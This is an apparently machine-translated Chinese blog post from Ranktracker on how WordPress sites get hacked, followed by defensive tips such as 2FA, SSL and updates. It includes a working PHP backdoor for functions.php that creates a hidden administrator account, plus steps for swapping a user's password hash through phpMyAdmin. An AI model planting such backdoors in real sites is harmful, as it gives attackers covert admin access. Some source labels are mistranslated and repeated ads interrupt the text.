• WordPress

如何破解WordPress?

  • Felix Rose-Collins
  • 9 min read
如何破解WordPress?

如何破解WordPress](introduction.png)

介绍

在开始这篇文章之前,我们想让你知道,黑客攻击是非法的,我们不鼓励任何恶意的活动。这篇文章只是为了让你了解骗子是如何工作的,以及各种网站安全方法对防止他们的危害是多么重要。我们来讨论一下。

  • 骗子是如何入侵WordPress的?
  • 如何保护你的WP网站不受骗子攻击?

所以,不用再多说了,让我们开始讨论这个话题。

如何在网上黑掉WordPress网站?

如何在线破解WordPress网站 (Source:wpsecurityninja.com)

###使用WPScan。 WPScan是一个WP安全扫描器,可以帮助网站所有者检查他们的WordPress网站是否有漏洞,但这个扫描器也被黑客利用来实现他们黑掉网站的动机。

WPScan允许网站所有者和管理员指定WP用户账户和暴力破解密码,是获得未经授权访问WP账户的首要步骤。

使用WPScan暴力破解用户名和密码 (使用WPScan暴力破解用户名和密码。源于此。Medium)

MIM攻击。

在用户使用类似局域网的情况下,中间人(MIM)攻击可以很容易地进行。非加密的用户登录是一个软目标,因为所有的细节都可以通过纯文本看到。

参与进行这些类型的攻击的软件可以发现被破坏的主题、插件并可以列举用户。

MIM攻击 (来源:《中国新闻周刊》。Medium)

SQL注入。

SQL注入攻击被认为是用于渗透网站的最突出攻击。这些攻击的目标是网站的后台网关,并允许黑客通过实施妥协的命令来渗透它们。

遇见Ranktracker

有效SEO的一体化平台

每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台

我们终于开放了Ranktracker的注册,完全免费!

创建一个免费账户

或使用您的证书登录

SQL注入 (来源:[secure.wphackedhelp.com](https://secure.wphackedhelp.com/blog/hack-wordpress-website/#How_To_Hack_A_WordPress_Website_8211_Various_Ways))

这些渗透还允许黑客修改数据库和命令,删除或窃取网站信息。

由于这些SQL攻击发现了易受攻击和未打补丁的网站,它们使黑客的任务变得容易和成功。

###利用我的SQL/cPanel。

在这种方法中,黑客创建一个假账户或修改当前WP网站用户的密码。黑客试图通过打开PhpMyAdmin来渗透到cPanel。他们在寻找以_users结尾的表,并找到他们想要修改的用户。

这将允许他们改变他们计划入侵的用户的凭证。他们通过打开在线MD5生成器追踪用户并改变用户的密码(来自user_pass字段),并将其替换为他们想要的密码,然后点击#。

遇见Ranktracker

有效SEO的一体化平台

每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台

我们终于开放了Ranktracker的注册,完全免费!

创建一个免费账户

或使用您的证书登录

! 利用我的SQL/cPanel (用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。源于此。firstsiteguide.com)

用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。

###编辑Functions.php。

黑客也会进入cPanel来修改Functions.php文件。通过解锁文件管理器,他们寻找活动主题的文件夹。 从public_html/wp_content/themes文件夹中,他们追踪主题,并通过放置他们破坏的代码来编辑 functions.php。由于黑客已经创建了一个新的账户,所以黑客已经在进行中了。一旦完成,他们就会擦除被破坏的代码。

通过FTP创建一个新的用户账户。

一般来说,FTP账户帮助网站所有者在其网站内生成一个目录,允许特定的用户使用其登录凭证上传/下载他们的文件。

这些文件也可以在互联网上查看。

> 在网站上创建一个FTP账户的步骤:。 > > - 输入所需的数据 > - 输入新的FTP用户的用户名 > - 输入用于分配账户的密码,以便通过FTP访问 > - 输入用于通过FTP访问的目录名称 > - 写下您希望分配给该文件夹的所需MB空间。 > - 然后按*"创建 "*按钮创建新帐户。

新用户必须加载以下数据才能通过FTP获得访问权。


地址/主机名/地址:yourdomain.com或ftp.yourdomain.com

用户/用户:user@yourdomain.com

密码:分配给这个FTP账户的El密码

端口:21 命名用于上传/下载文件的文件夹。


新用户将对所选目录及其包含的所有子目录拥有读写权限。

例如,如果你创建了客户用户,并给他访问/home / user / public_html的权限

通过后门渗透。

渗透网站的恶意方式是通过后门。无论是想进入你的网站的诈骗者,还是想通过后门进入重新获得网站访问权的受害用户,他们都需要遵循以下步骤。

在某些情况下,当通过FTP创建一个新的用户账户或进行密码重置时,但没有得到理想的结果,用户可能想通过后门进入黑掉他们的网站,找回他们的管理权限。

创建后门的步骤:

  • 打开 functions.php 文件并粘贴下面的代码。
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • 稍后保存更改。

加密货币劫持和加密货币开采。

加密货币的流行催生了新的网络威胁,如crypto-jacking,它也被称为加密货币采矿恶意软件。

违背用户的意愿以及意识而没收计算机的行为被称为加密劫持。在加密劫持恶意软件中,骗子通过软件传递的恶意软件感染用户的计算机,以破坏系统和网络。

网络钓鱼。

网络钓鱼是一种方法,欺诈者通过冒充合法实体欺骗用户的敏感信息(登录凭证、社会账户号码、密码、信用卡详细信息等)。他们通常借助于电子邮件来实现其目的。

> **例子:**骗子可能冒充可靠的来源,从用户那里收集个人资料,以满足他们的愿望。 > 他们还可能在钓鱼邮件中放置一个坏链接,并将他们引向一些欺诈性网站以传递恶意软件。

恶意软件。

*WordPress安全统计表明,有4000个WP网站由于假的SEO插件而被恶意软件感染。

骗子们不需要一个源头来传递恶意软件。SEO插件、WP主题以及网站中存在的许多其他因素都促使黑客使用最近的WP-VCD恶意软件。

甚至钓鱼邮件也是传递恶意软件的门路。

在这里,黑客的座右铭也是一样的,即通过渗透系统和窃取信息获得用户的敏感数据。

WordPress勒索软件。

在WP勒索软件中,黑客使用恶意软件来阻止用户访问系统和网络。用户可以通过支付黑客所要求的赎金来恢复这些数据。 > 例子: Petya攻击,黑客对你的文件和数据进行加密,并对解密密钥要求赎金。

跨站脚本(XSS)攻击。

XSS攻击是由黑客通过向网站注入恶意内容,从而利用浏览器来进行的。这种攻击允许黑客从cookies中窃取数据,修改网站内容,并抓住网站获取敏感数据。

###点击劫持。 在点击劫持中,黑客恶意地试图破坏一个按钮/链接,并促使用户点击被破坏的对象。 这允许黑客执行恶意命令,以获取用户的敏感数据。

欺骗。

欺骗是一种攻击,在这种攻击中,某人将自己伪装成一个值得信赖的身份,以获得用户的非法利益,欺骗他们提交他们的机密信息。

为了防止所有这些黑客攻击,需要采取具体的安全措施来保护你的WP网站。

如何保护WordPress网站免受黑客攻击?

如何保护WordPress网站免受黑客攻击? (来源:envisaged digital.co.uk)

以上的统计数据足以说明WordPress的受欢迎程度。正是这种受欢迎程度使得这个CMS平台在黑客中更受欢迎,他们尝试各种黑客方法来获取WP网站和他们的数据。

因此,了解如何防止黑客访问你的WP网站是非常重要的。

###用SSL证书保护你的WP网站。

当任何数据被加载到网站上时,它总是以纯文本形式存在,包括黑客在内的所有人都很容易看到。这可能是有风险的,因为黑客可以滥用你的网站数据。

SSL *(安全套接字层)*证书是那些有助于用256位加密安全保护你的WP网站的数字证书,从而将你的网站数据转换为编码格式。

黑客虽然获得了对你网站的访问权,但却无法读取代码,因此他们被迫离开这样的网站。

用SSL证书保护你的WP网站](ssl.jpg) (来源:《中国新闻周刊》。clickssl.net)

选择你想要的SSL证书品牌(Comodo、Thawte、RapidSSL等)并在你的WP网站上安装相同的证书。就SSL证书的类型而言,你需要了解域名和子域名。例如,如果你的WP网站有子域,那么,一个便宜的通配符证书大约只需要*45美元/年,就可以保证你的整个数字业务。

快速签发、2048位密钥加密、促进搜索引擎优化、网站信任印章、99%的浏览器/移动设备兼容性、退款政策和保修是安装野卡SSL证书的一些特点和好处。

SSL产品的各种品牌和选择、预算友好的价格和优秀的客户服务是接近ClickSSL商店以确保WP网站安全的几个好处。

###更新你的雇员。

人为的错误可能是灾难性的,所以一定要确保让你的员工了解最新的网络威胁,避免他们受到伤害。

如果你的员工能够在初始阶段追踪到黑客网站的可疑信号,他们可以通知有关方面,防止你的网站和业务受到进一步的损害。

使用双因素认证(2FA)。

在网站登录过程中实施2FA是抵御蛮力攻击的最关键的方法。除了增加另一个安全层,它们还可以防止网站和用户数据。

这是因为如果一个安全层被破坏,诈骗者需要入侵第二层来获得网站的访问权。

这是一个艰难的决定,因此在大多数情况下,诈骗者最终会转移到其他安全性差的网站。

> 提示: WP 2FA是一个免费的WP插件,为你的WP网站提供一个额外的安全层。

定期审计管理员用户。

这对你的WP网站的安全非常重要。确保定期审核您的管理用户,并交叉检查他们的访问权限。

同时确保你的用户以及员工根据他们的任务拥有有限的访问权限,以防止安全漏洞。

定期更新WordPress核心。

不了解WP核心?

让我告诉你,WP核心包括所有WP工作所需的基本基础文件。

从WordPress.org下载的WP压缩文件中的文件列表

定期更新WordPress Core (Source:ithemes.com)

这些核心文件需要在安全更新发布后定期更新,以修补所有的安全漏洞。

从值得信赖的来源下载WP主题和插件。

这是至关重要的,因为当插件没有更新或从不可信的来源安装时,它们可能会很危险。在使用免费/付费插件的情况下,一定要检查以下所述的因素,如。

  • 用户评级和评论
  • 用户友好度
  • 兼容性
  • 安全性
  • 可信度

下载值得信赖的WP主题和插件](image11.png) (Source:torquemag.io)

这条规则也适用于安装WP主题。

###定期更新WP主题和插件。

过时或过期的WP主题和插件总是对你的WP网站构成威胁,因为它们的安全标准已经丧失了。为了防止黑客利用这种途径传播恶意软件来获取网站访问权,请确保定期更新您的WP网站中使用的主题和插件。

这将有助于插件的正常运行,并与最新版本的WP保持同步。

> **提示:**在插件页面,您可以查看所有已安装的插件,以及每个插件旁边的 "启用自动更新 "链接。把它打开,以便自动更新。

###修改默认的管理员名称。

黑客太聪明了,他们可以通过使用默认的管理名称轻松地渗透到你的WP网站。最好是修改默认的管理用户名,以防止黑客执行暴力攻击以获得对你网站的未经授权的访问。

授予有限的访问权。

永远不要给予超过必要的权限,同样的规则也适用于授予用户以及雇员的网站权限。

访问控制是网站和数据安全的首要规则,因为它定义了谁能或不能访问网站。为了网站的安全,封锁WP管理和其他关键代码和数据的所有入口。

限制访问不仅能提高生产力,而且还能保证你的网站不被恶意进入。

###更新WordPress。

当你的WordPress没有更新时,你的网站就有被黑客入侵的风险。

WordPress占据了37%的市场份额,而且它不断地定期发布更新,以修复安全漏洞和错误。这些更新还包括新的功能和对现有功能的改进,这对提高你的网站性能很有用。

遇见Ranktracker

有效SEO的一体化平台

每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台

我们终于开放了Ranktracker的注册,完全免费!

创建一个免费账户

或使用您的证书登录

为什么你应该经常更新你的WordPress](update-wordpress.png) (来源:《中国新闻周刊》。wpbeginner.com)

保持你的WP网站更新,以获得强大的安全性。

总结。

使用强大而复杂的密码,保持你的WP网站以及插件和主题的更新,以修复所有的安全漏洞。花时间教育你的员工,因为这总是有助于预防灾难。

永远不要在安全问题上松懈,并始终确保使用最好的和值得信赖的安全插件,以保持你的WP网站安全不受窥视。此外,用SSL保护你的网站,以提高客户的信任,业务和[SEO](/blog/what-is-seo/)。

现在你已经知道了黑客是如何运作的,我们希望这篇文章能帮助你防止黑客渗透到你的网站,并以安全的方式管理你的WP网站。

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

开始使用Ranktracker...免费的!

找出阻碍你的网站排名的原因。

创建一个免费账户

或使用您的证书登录

Different views of Ranktracker app